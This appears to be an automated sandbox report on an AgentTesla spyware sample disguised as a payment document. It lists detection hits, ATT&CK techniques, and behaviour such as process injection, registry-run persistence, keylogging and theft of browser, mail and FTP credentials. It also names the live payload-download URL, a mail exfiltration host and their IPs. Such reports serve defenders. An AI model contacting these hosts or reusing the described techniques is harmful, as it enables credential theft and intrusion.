                    Source: Yara matchFile source: 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Payment-Details.scr.exe PID: 432, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2332, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Fdimzk.exe PID: 6012, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Fdimzk.exe PID: 3228, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2740, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2852, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 5.2.Fdimzk.exe.41206f0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Fdimzk.exe.382ec18.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payment-Details.scr.exe.4513690.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Fdimzk.exe.382ec18.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Fdimzk.exe.41206f0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payment-Details.scr.exe.4513690.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.2016324901.00000000023AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2100971081.0000000003269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2016324901.0000000002381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2041551021.0000000003819000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2101369596.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2101369596.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2012136822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2700908180.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2101369596.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2700908180.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1676003919.00000000037C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2016324901.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2700908180.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2013699239.0000000002B02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2124173104.000000000410B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Payment-Details.scr.exe PID: 432, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2332, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Fdimzk.exe PID: 6012, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Fdimzk.exe PID: 3228, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2740, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2852, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		211
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		34
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    Registry Run Keys / Startup Folder                    		1
                    Scheduled Task/Job                    		2
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		1
                    Query Registry                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Registry Run Keys / Startup Folder                    		2
                    Software Packing                    		NTDS531
                    Security Software Discovery                    		Distributed Component Object Model21
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets1
                    Process Discovery                    		SSHKeylogging13
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                    Masquerading                    		Cached Domain Credentials261
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items261
                    Virtualization/Sandbox Evasion                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                    Process Injection                    		Proc Filesystem1
                    System Network Configuration Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1495997 Sample: Payment-Details.scr.exe Startdate: 20/08/2024 Architecture: WINDOWS Score: 100 32 nffplp.com 2->32 34 ip-api.com 2->34 36 etehadshipping.com 2->36 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->58 60 13 other signatures 2->60 7 Payment-Details.scr.exe 16 4 2->7         started        12 Fdimzk.exe 14 2 2->12         started        14 Fdimzk.exe 2 2->14         started        signatures3 process4 dnsIp5 38 etehadshipping.com 5.144.130.41, 443, 49704, 62398 HOSTIRAN-NETWORKIR Iran (ISLAMIC Republic Of) 7->38 24 C:\Users\user\AppData\Roaming\Fdimzk.exe, PE32 7->24 dropped 26 C:\Users\user\...\Fdimzk.exe:Zone.Identifier, ASCII 7->26 dropped 62 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->62 64 Writes to foreign memory regions 7->64 66 Injects a PE file into a foreign processes 7->66 16 InstallUtil.exe 14 2 7->16         started        68 Multi AV Scanner detection for dropped file 12->68 70 Machine Learning detection for dropped file 12->70 20 InstallUtil.exe 12->20         started        22 InstallUtil.exe 14->22         started        file6 signatures7 process8 dnsIp9 28 ip-api.com 208.95.112.1, 62396, 62402, 62405 TUT-ASUS United States 16->28 30 nffplp.com 163.44.198.71, 587, 62397, 62404 GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG Singapore 16->30 40 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 16->40 42 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->42 44 Installs a global keyboard hook 20->44 46 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 22->46 48 Tries to steal Mail credentials (via file / registry access) 22->48 50 Tries to harvest and steal ftp login credentials 22->50 52 Tries to harvest and steal browser information (history, passwords, etc) 22->52 signatures10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Payment-Details.scr.exe18%ReversingLabs
                    Payment-Details.scr.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\Fdimzk.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\Fdimzk.exe18%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://sectigo.com/CPS00%URL Reputationsafe
                    https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    http://x1.c.lencr.org/00%URL Reputationsafe
                    http://x1.i.lencr.org/00%URL Reputationsafe
                    https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                    https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                    http://ip-api.com0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                    https://etehadshipping.com/chmod0%Avira URL Cloudsafe
                    http://nffplp.com0%Avira URL Cloudsafe
                    https://github.com/mgravell/protobuf-neti0%Avira URL Cloudsafe
                    https://etehadshipping.com/chmod%20permission%20777/panel/Uslmwziyya.vdf0%Avira URL Cloudsafe
                    https://github.com/mgravell/protobuf-netJ0%Avira URL Cloudsafe
                    http://r11.o.lencr.org0#0%Avira URL Cloudsafe
                    http://ip-api.com/line/?fields=hostingD9;k0%Avira URL Cloudsafe
                    http://ip-api.com/line/?fields=hostingc90%Avira URL Cloudsafe
                    https://etehadshipping.com0%Avira URL Cloudsafe
                    http://r11.i.lencr.org/030%Avira URL Cloudsafe
                    https://github.com/mgravell/protobuf-net0%Avira URL Cloudsafe
                    http://ip-api.com/line/?fields=hosting-0%Avira URL Cloudsafe
                    http://ip-api.com/line/?fields=hosting%0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ip-api.com
                    		208.95.112.1
                    		truetrue
                      		unknown
                      nffplp.com
                      		163.44.198.71
                      		truetrue
                        		unknown
                        etehadshipping.com
                        		5.144.130.41
                        		truefalse
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://etehadshipping.com/chmod%20permission%20777/panel/Uslmwziyya.vdffalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ip-api.com/line/?fields=hostingfalse
                          • URL Reputation: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://etehadshipping.com/chmodPayment-Details.scr.exe, Fdimzk.exe.0.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://nffplp.comInstallUtil.exe, 00000003.00000002.2016324901.00000000023B4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2101369596.0000000002DE4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2700908180.0000000002CEE000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://sectigo.com/CPS0InstallUtil.exe, 00000003.00000002.2012932456.000000000060A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2023490581.0000000004C82000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2016324901.00000000023B4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2101369596.0000000002DE4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2116445319.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2100799382.00000000012AF000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2700908180.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2713649134.0000000006000000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://github.com/mgravell/protobuf-netiPayment-Details.scr.exe, 00000000.00000002.1685635994.00000000048CD000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1693072920.00000000071D0000.00000004.08000000.00040000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://stackoverflow.com/q/14436606/23354Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000048CD000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1693072920.00000000071D0000.00000004.08000000.00040000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1676003919.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2013699239.000000000273C000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2100971081.0000000002F0D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://account.dyn.com/Payment-Details.scr.exe, 00000000.00000002.1676003919.00000000037C9000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2012136822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2041551021.0000000003819000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2013699239.0000000002B02000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2100971081.0000000003269000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2124173104.000000000410B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://github.com/mgravell/protobuf-netJPayment-Details.scr.exe, 00000000.00000002.1685635994.00000000048CD000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1693072920.00000000071D0000.00000004.08000000.00040000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2041551021.0000000003C53000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2124173104.0000000004413000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://r11.o.lencr.org0#Fdimzk.exe, 00000005.00000002.2100971081.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2097879038.000000000128E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ip-api.com/line/?fields=hostingD9;kInstallUtil.exe, 00000003.00000002.2012932456.000000000060A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://r11.i.lencr.org/03Fdimzk.exe, 00000005.00000002.2100971081.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2097879038.000000000128E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://x1.c.lencr.org/0Fdimzk.exe, 00000005.00000002.2097879038.000000000128E000.00000004.00000020.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2097879038.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://x1.i.lencr.org/0Fdimzk.exe, 00000005.00000002.2097879038.000000000128E000.00000004.00000020.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2097879038.00000000012DB000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://stackoverflow.com/q/11564914/23354;Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000048CD000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1693072920.00000000071D0000.00000004.08000000.00040000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://stackoverflow.com/q/2152978/23354Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000048CD000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1693072920.00000000071D0000.00000004.08000000.00040000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://ip-api.com/line/?fields=hostingc9InstallUtil.exe, 00000003.00000002.2012932456.000000000060A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ip-api.comInstallUtil.exe, 00000003.00000002.2016324901.0000000002351000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2101369596.0000000002D8C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2700908180.0000000002C9C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://etehadshipping.comPayment-Details.scr.exe, 00000000.00000002.1676003919.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2013699239.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2100971081.0000000002EBB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://github.com/mgravell/protobuf-netPayment-Details.scr.exe, 00000000.00000002.1685635994.00000000048CD000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1693072920.00000000071D0000.00000004.08000000.00040000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://ip-api.com/line/?fields=hosting%InstallUtil.exe, 00000008.00000002.2099749827.00000000011FE000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePayment-Details.scr.exe, 00000000.00000002.1676003919.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2016324901.0000000002351000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2013699239.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2100971081.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2101369596.0000000002D8C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2700908180.0000000002C9C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://ip-api.com/line/?fields=hosting-InstallUtil.exe, 00000009.00000002.2697884793.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          5.144.130.41
                          		etehadshipping.comIran (ISLAMIC Republic Of)
                          		59441HOSTIRAN-NETWORKIRfalse
                          208.95.112.1
                          		ip-api.comUnited States
                          		53334TUT-ASUStrue
                          163.44.198.71
                          		nffplp.comSingapore
                          		135161GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSGtrue

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1495997
                          Start date and time:2024-08-20 18:38:16 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 9m 10s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:11
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Payment-Details.scr.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@9/2@3/3
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 95%
                          • Number of executed functions: 528
                          • Number of non-executed functions: 26
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: Payment-Details.scr.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          12:39:13API Interceptor105x Sleep call for process: Payment-Details.scr.exe modified
                          12:39:39API Interceptor26039x Sleep call for process: InstallUtil.exe modified
                          12:39:47API Interceptor295x Sleep call for process: Fdimzk.exe modified
                          18:39:38AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Fdimzk C:\Users\user\AppData\Roaming\Fdimzk.exe
                          18:39:47AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Fdimzk C:\Users\user\AppData\Roaming\Fdimzk.exe

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          208.95.112.1ExeFile (275).exeGet hashmaliciousQuasarBrowse
                          • ip-api.com/json/
                          ExeFile (351).exeGet hashmaliciousQuasarBrowse
                          • ip-api.com/json/
                          ExeFile (206).exeGet hashmaliciousRMSRemoteAdmin, XmrigBrowse
                          • ip-api.com/json
                          DHL-SOA_88417.batGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          PO 28014399.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          documentos43.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          PI-0008102024002REMAP.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          INV N.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          PAGO SWIFT INV NUMB43568B30000097 PDF.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          lPq4mW9QT0.exeGet hashmaliciousGo InjectorBrowse
                          • ip-api.com/json/?fields=status,message,query,country,regionName,city,isp,timezone
                          163.44.198.71Outward Remittance_Payment Receipt.exeGet hashmaliciousAgentTeslaBrowse
                            SOA Payment for June 30th.exeGet hashmaliciousAgentTeslaBrowse
                              US00061Q0904081THBKK.exeGet hashmaliciousAgentTeslaBrowse
                                SecuriteInfo.com.Win32.PWSX-gen.17036.7156.exeGet hashmaliciousAgentTeslaBrowse
                                  SecuriteInfo.com.Win32.PWSX-gen.25669.202.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    Commercial_Inv_and_PList.exeGet hashmaliciousAgentTeslaBrowse

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      nffplp.comOutward Remittance_Payment Receipt.exeGet hashmaliciousAgentTeslaBrowse
                                      • 163.44.198.71
                                      SOA Payment for June 30th.exeGet hashmaliciousAgentTeslaBrowse
                                      • 163.44.198.71
                                      US00061Q0904081THBKK.exeGet hashmaliciousAgentTeslaBrowse
                                      • 163.44.198.71
                                      SecuriteInfo.com.Win32.PWSX-gen.17036.7156.exeGet hashmaliciousAgentTeslaBrowse
                                      • 163.44.198.71
                                      SecuriteInfo.com.Win32.PWSX-gen.25669.202.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 163.44.198.71
                                      Commercial_Inv_and_PList.exeGet hashmaliciousAgentTeslaBrowse
                                      • 163.44.198.71
                                      ip-api.comExeFile (275).exeGet hashmaliciousQuasarBrowse
                                      • 208.95.112.1
                                      ExeFile (351).exeGet hashmaliciousQuasarBrowse
                                      • 208.95.112.1
                                      ExeFile (206).exeGet hashmaliciousRMSRemoteAdmin, XmrigBrowse
                                      • 208.95.112.1
                                      ExeFile (10).exeGet hashmaliciousCryptbotBrowse
                                      • 208.95.112.1
                                      DHL-SOA_88417.batGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      PO 28014399.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      documentos43.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      PI-0008102024002REMAP.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      INV N.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      PAGO SWIFT INV NUMB43568B30000097 PDF.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      HOSTIRAN-NETWORKIRrDHL_PT563857935689275783656385FV-GDS3535353.batGet hashmaliciousFormBook, GuLoaderBrowse
                                      • 185.83.114.124
                                      rFV-452747284IN.batGet hashmaliciousFormBook, GuLoaderBrowse
                                      • 185.83.114.124
                                      Shipping Docs.rdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 5.144.130.49
                                      PAYMENT LIST.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 5.144.130.49
                                      PO# CV-PO23002552.PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 5.144.130.49
                                      PO# CV-PO23002552.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 5.144.130.35
                                      Overdue Account.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 5.144.130.35
                                      https://hamrahansystem.com/4xe3cx/?PliaTEYmfRshGet hashmaliciousUnknownBrowse
                                      • 45.138.134.33
                                      Saham_Man.apkGet hashmaliciousIRATABrowse
                                      • 5.144.130.58
                                      Invoice-AWB-Document.doc.exeGet hashmaliciousAgentTeslaBrowse
                                      • 5.144.130.32
                                      GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSGQoute_EXW_prices_43GJI_pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                      • 118.27.130.234
                                      Qoute_EXW_prices_43GJI_pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                      • 118.27.130.234
                                      https://cpanel12wh.bkk1.cloud.z.com/~cp318430/app/browser/info/billing2.php/Get hashmaliciousUnknownBrowse
                                      • 163.44.198.61
                                      https://dub.sh/nL4qBGQGet hashmaliciousUnknownBrowse
                                      • 150.95.31.161
                                      Outward Remittance_Payment Receipt.exeGet hashmaliciousAgentTeslaBrowse
                                      • 163.44.198.71
                                      http://coffeeroasting.co.th/Get hashmaliciousUnknownBrowse
                                      • 163.44.198.45
                                      SOA Payment for June 30th.exeGet hashmaliciousAgentTeslaBrowse
                                      • 163.44.198.71
                                      US00061Q0904081THBKK.exeGet hashmaliciousAgentTeslaBrowse
                                      • 163.44.198.71
